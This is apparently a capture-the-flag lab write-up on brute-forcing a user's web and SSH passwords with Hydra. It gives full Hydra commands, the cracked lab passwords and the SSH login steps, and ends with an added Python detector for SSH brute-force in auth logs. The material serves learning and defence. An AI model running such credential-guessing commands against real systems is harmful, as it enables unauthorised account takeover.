1. Use Hydra to bruteforce molly’s web password. What is flag 1?
Scan open ports
nmap -p- <ip>

Access the HTTP site and try logging in to see what happens

Seems like I don’t have the correct credentials.

View source shows nothing

Intercept with Burp Suite. It’s a POST request.

Try SQL injection, but it doesn’t work either.

Without any further information, I’ll have to brute-force with Hydra.
Craft the command.
hydra -l molly -P rockyou.txt <ip> http-post-form "/login:username=^USER^&password=^PASS^:F=Your username or password is incorrect." -V

Run the command

Result -> molly:sunshine

Log in; now I have the first flag.


2. Use Hydra to bruteforce molly’s SSH password. What is flag 2?
hydra -l molly -P Desktop/rockyou.txt 10.10.138.145 ssh -t 4
Result -> molly:butterfly

SSH login
ssh molly@<ip>

Read flag file
ls
cat flag2.txt
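
How the SSH brute force in step 2 looks from the server side, as an added example that is not part of the original write-up: a Python check over constructed sshd log lines that flags a source with repeated failed passwords for one user and marks the account as compromised when a successful login follows. The log lines, addresses, the `detect_bruteforce` name and the threshold of 5 are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in OpenSSH auth-log format (not taken from the write-up).
# 203.0.113.7 and 198.51.100.20 are documentation addresses.
SAMPLE_LOG = "\n".join(
    [f"Jan 10 10:00:{i:02d} box sshd[{900 + i}]: Failed password for molly "
     f"from 203.0.113.7 port {40000 + i} ssh2" for i in range(6)]
    + [
        "Jan 10 10:00:07 box sshd[907]: Accepted password for molly "
        "from 203.0.113.7 port 40007 ssh2",
        # A user who mistypes twice and then logs in must not be flagged.
        "Jan 10 10:05:01 box sshd[950]: Failed password for alice "
        "from 198.51.100.20 port 51000 ssh2",
        "Jan 10 10:05:09 box sshd[951]: Failed password for alice "
        "from 198.51.100.20 port 51001 ssh2",
        "Jan 10 10:05:20 box sshd[952]: Accepted password for alice "
        "from 198.51.100.20 port 51002 ssh2",
    ]
)

LINE_RE = re.compile(
    r"sshd\[\d+\]: (Failed|Accepted) password for "
    r"(?:invalid user )?(\S+) from (\S+) port \d+"
)

def detect_bruteforce(log_text, threshold=5):
    """Return {(source, user): {"failures": n, "compromised": bool}} for every
    pair with at least `threshold` failed passwords. "compromised" is set when
    the same source later logs in successfully as that user."""
    failures = defaultdict(int)
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        outcome, user, src = m.groups()
        key = (src, user)
        if outcome == "Failed":
            failures[key] += 1
            if failures[key] >= threshold:
                entry = findings.setdefault(key, {"compromised": False})
                entry["failures"] = failures[key]
        elif key in findings:
            # Success after a flagged run of failures: the guess landed.
            findings[key]["compromised"] = True
    return findings

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))
```

A finding with `compromised` set means the password should be rotated and the session investigated; rate limiting or key-only authentication on sshd removes the exposure.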
